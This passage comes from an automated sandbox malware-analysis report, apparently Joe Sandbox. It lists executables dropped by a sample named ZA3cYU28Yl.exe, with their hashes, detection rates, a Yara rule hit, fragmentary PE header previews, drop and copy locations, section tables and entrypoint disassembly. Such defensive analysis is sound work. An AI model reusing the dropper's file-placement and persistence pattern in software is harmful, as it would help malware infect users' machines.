                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\8ECE.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3590144
                                                                                                        Entropy (8bit):7.997643531968
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                        MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                        SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                        SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                        SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):301056
                                                                                                        Entropy (8bit):5.192330972647351
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                        MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                        SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                        SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                        SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                         • Antivirus: Metadefender, Detection: 46%
                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\969F.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):5.021094695416705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                        MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                        SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                        SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                        SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\969F.exe, Author: Florian Roth
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 35%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                        C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):324608
                                                                                                        Entropy (8bit):6.705560699768563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8cXfhxLWOCPRZa9XQ9XuxYADj5QTM44lq46Ue:8cXfhxKPZyK+x3NQN4l3Je
                                                                                                        MD5:043B44289E31BD54357F9A5C21833259
                                                                                                        SHA1:C042C1D364887BBF71B070C8DD6C66C08A818834
                                                                                                        SHA-256:8DC59F6481C6FE183ADAC2B720FFA276CC9F52D83521200B1A85BB5FF8E4046A
                                                                                                        SHA-512:AC7098ED6CC6922577D0C87F4E3BA6EF32973C1641C98B3C675EFBBC548A63346DE87A0026ADB850144B120604BB7B9982A69E1AA2859D0E0A3A0CCE08573756
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...o.}`............................P.............@.................................[.......................................t...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....zic................................@....wuvuhus............................@....jufot..............................@....rsrc...(............$..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):320000
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        MD5:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        SHA1:F4AA59829222D5ED000849EA0167082F54B59E03
                                                                                                        SHA-256:760D44EA1A90C1B235133258A8F03BED049B5B51328AEFE4A2595B6F085DD99D
                                                                                                        SHA-512:5D88BC6FA746628F9EB792612B857D7724DA4827445EDF2A7850190358A3C9C08CAA602DF2CC92EBA96571D4C34A0E311007C8688FA437203F8EEC3185C2ED8F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@..................................i..........................................P.......(...............................................................@...............L............................text...n........................... ..`.data...............................@....wumened............................@....kilohe.............................@....putohox............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):321024
                                                                                                        Entropy (8bit):6.689067457982047
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:XxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnysp:XPTWRRZM+fuJR5sG
                                                                                                        MD5:9AF71C74219794F100EA801B528339AF
                                                                                                        SHA1:DDE2BB10F1E77E03CF9190467DB85E515D720012
                                                                                                        SHA-256:84AEC628E2903022FBC5737746812D983B65A1D1EFD1110FF7D15BA49D6D15B0
                                                                                                        SHA-512:602ACA3D539FF09F384B35FA8C2B8521F20113362E33657FCB645D3171A402DBADFF7F4E564D57B34B896CBB55E55718CFC947F61CABAD1C9058E624B9B9E6BB
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:modified
                                                                                                        Size (bytes):537088
                                                                                                        Entropy (8bit):5.840438491186833
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                        MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                        SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                        SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                        SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                        C:\Users\user\AppData\Local\Temp\lnagngtg.exe
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11619840
                                                                                                        Entropy (8bit):3.8195691800841227
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:rxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnyspaaaaaaaaaaaaaaaaaaaaaH:rPTWRRZM+fuJR5sG
                                                                                                        MD5:673D618D671523049906C3308A9AAD4F
                                                                                                        SHA1:D0ED8C79559CE9000A8196E62B127E40A8C61CB7
                                                                                                        SHA-256:5D2E5FFDA32AC3FEEA1526B4F05363B6F1994F18C1F27993FED00ACD4FCF7C88
                                                                                                        SHA-512:57622653554190523F7BFC4C127B33974335D3C8B98C041940545B9AEF53C69555D7E858542FCA08441EF6350B9D2E5926C97C70623783C8848DE0789FE65DE8
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):320000
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        MD5:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        SHA1:F4AA59829222D5ED000849EA0167082F54B59E03
                                                                                                        SHA-256:760D44EA1A90C1B235133258A8F03BED049B5B51328AEFE4A2595B6F085DD99D
                                                                                                        SHA-512:5D88BC6FA746628F9EB792612B857D7724DA4827445EDF2A7850190358A3C9C08CAA602DF2CC92EBA96571D4C34A0E311007C8688FA437203F8EEC3185C2ED8F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`..........................................@..................................i..........................................P.......(...............................................................@...............L............................text...n........................... ..`.data...............................@....wumened............................@....kilohe.............................@....putohox............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\rcvfbte:Zone.Identifier
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26
                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):9062
                                                                                                        Entropy (8bit):3.1625951749021364
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z2+h:j+s+v+b+P+m+0+Q+q+9+h
                                                                                                        MD5:44A7B0493CF5DB2EA4B3AA98E369F59D
                                                                                                        SHA1:60322A1984D18CEB3F7105F9086584FFAEEDBBC5
                                                                                                        SHA-256:4248B10ADC263B0A71E1458C5A950B9387DFD5124DD8B91928684262E1DABF11
                                                                                                        SHA-512:7081E092B955DEEA6B1BCF1504EF3812A1ABF0A33BF13F33B8BBBA8ACF22941288A7BA0A9CF5F6E50BFFE52CDF60670A9DB3AC5E18E87BFA296367E8EAF4FD1A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                         Preview (UTF-16LE log text decoded from the byte preview):
                                                                                                         -------------------------------------------------------------------------------------
                                                                                                         MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                          Start Time: Thu Jun 27 2019 01:29:49
                                                                                                         MpEnsureProcessMitigationPolicy: hr = 0x1
                                                                                                         WDEnable
                                                                                                         ERROR: MpWDEnable(TRUE) failed (800704EC)
                                                                                                         MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
                                                                                                         -------------------------------------------------------------------------------------
                                                                                                         ------------------------------------------
                                                                                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_042221_285.etl
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8192
                                                                                                        Entropy (8bit):3.318412811253484
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:jC/C42o+WK5Su912YnmC0vI2lXSk4P4mlT2WYFzqUMCv6JRW:2YtkyX2YvnCAw
                                                                                                        MD5:EFF2FE31D906DBDDEC1625C346AC4F99
                                                                                                        SHA1:C265CAF999BC43A36D61FB235CDFE77C1AB4916D
                                                                                                        SHA-256:2EB779DDF0FD27ED793FBA33F606DDDEA5CAC283DA2810E3932B43E6F3347DFB
                                                                                                        SHA-512:897D7F6E59C9041C5DB3FC1975382F61B4465CBD6BEA91198238EF0BDEC2064794F2C7BBD77725F75E38E1504617227262CAFF5186AD96E1384F7EC2E583730E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: .... ... ....................................... ...!............................................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......PR}............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.4.2.2.2.1._.2.8.5...e.t.l.........P.P.................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11619840
                                                                                                        Entropy (8bit):3.8195691800841227
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:rxPbeuhFMQH+prd0WRRa/CMjXOfo68JRD0QsGrnyspaaaaaaaaaaaaaaaaaaaaaH:rPTWRRZM+fuJR5sG
                                                                                                        MD5:673D618D671523049906C3308A9AAD4F
                                                                                                        SHA1:D0ED8C79559CE9000A8196E62B127E40A8C61CB7
                                                                                                        SHA-256:5D2E5FFDA32AC3FEEA1526B4F05363B6F1994F18C1F27993FED00ACD4FCF7C88
                                                                                                        SHA-512:57622653554190523F7BFC4C127B33974335D3C8B98C041940545B9AEF53C69555D7E858542FCA08441EF6350B9D2E5926C97C70623783C8848DE0789FE65DE8
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...i.`..........................................@.................................s...........................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....mekafe.............................@....tuxu...............................@....hawoz..............................@....rsrc...(...........................@..@.reloc..ZF..........................@..B................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.6829606926024825
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:ZA3cYU28Yl.exe
                                                                                                        File size:320000
                                                                                                        MD5:679831cf1f00950b4adffbbba7e6ab46
                                                                                                        SHA1:f4aa59829222d5ed000849ea0167082f54b59e03
                                                                                                        SHA256:760d44ea1a90c1b235133258a8f03bed049b5b51328aefe4a2595b6f085dd99d
                                                                                                        SHA512:5d88bc6fa746628f9eb792612b857d7724da4827445edf2a7850190358a3c9c08caa602df2cc92eba96571d4c34a0e311007c8688fa437203f8eec3185c2ed8f
                                                                                                        SSDEEP:6144:+/jCnwGXFliTnwC2aJLQt55gPnHswDcEgoJgnyyB:+/jZR2GK7g/swdgoiF
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L......`...........................

                                                                                                        File Icon

                                                                                                        Icon Hash:c8d0d8e0f0e0f4e0

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x41b290
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                        Time Stamp:0x602EA3B5 [Thu Feb 18 17:28:21 2021 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007FED28AEE81Bh
                                                                                                        call 00007FED28AE1796h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push FFFFFFFEh
                                                                                                        push 0043D888h
                                                                                                        push 0041E470h
                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                        push eax
                                                                                                        add esp, FFFFFF94h
                                                                                                        push ebx
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov eax, dword ptr [00440354h]
                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                        xor eax, ebp
                                                                                                        push eax
                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                        push eax
                                                                                                        call dword ptr [0040109Ch]
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        jmp 00007FED28AE17A8h
                                                                                                        mov eax, 00000001h
                                                                                                        ret
                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                        jmp 00007FED28AE18D7h
                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                        call 00007FED28AE1914h
                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                        push 00000001h
                                                                                                        call 00007FED28AEF1FAh
                                                                                                        add esp, 04h
                                                                                                        test eax, eax
                                                                                                        jne 00007FED28AE178Ch
                                                                                                        push 0000001Ch
                                                                                                        call 00007FED28AE18CCh
                                                                                                        add esp, 04h
                                                                                                        call 00007FED28AEA874h
                                                                                                        test eax, eax
                                                                                                        jne 00007FED28AE178Ch
                                                                                                        push 00000010h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2008 build 21022
                                                                                                        • [IMP] VS2005 build 50727
                                                                                                        • [ASM] VS2008 build 21022
                                                                                                        • [LNK] VS2008 build 21022
                                                                                                        • [RES] VS2008 build 21022
                                                                                                        • [C++] VS2008 build 21022

                                                                                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3dfb4 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x150000 | 0x8728 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x159000 | 0x1e00 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x13a0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9100 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x34c | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e36e | 0x3e400 | False | 0.581129204317 | data | 6.95926809019 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x10c988 | 0x1800 | False | 0.3408203125 | data | 3.46519187176 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.wumened | 0x14d000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.kilohe | 0x14e000 | 0xea | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.putohox | 0x14f000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x150000 | 0x8728 | 0x8800 | False | 0.595042509191 | data | 5.83826747573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x159000 | 0x465a | 0x4800 | False | 0.344672309028 | data | 3.68878313517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0x157048 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157040 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157050 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x157058 | 0x2 | data | Dutch | Netherlands
CIDAFICUDUROSOTAROM | 0x156628 | 0x6c7 | ASCII text, with very long lines, with no line terminators | Assamese | India
VIDIWAYAPENIGU | 0x156cf0 | 0x2fa | ASCII text, with very long lines, with no line terminators | Assamese | India
RT_CURSOR | 0x157060 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Dutch | Netherlands
RT_ICON | 0x150740 | 0x6c8 | data | Assamese | India
RT_ICON | 0x150e08 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
RT_ICON | 0x151370 | 0x10a8 | data | Assamese | India
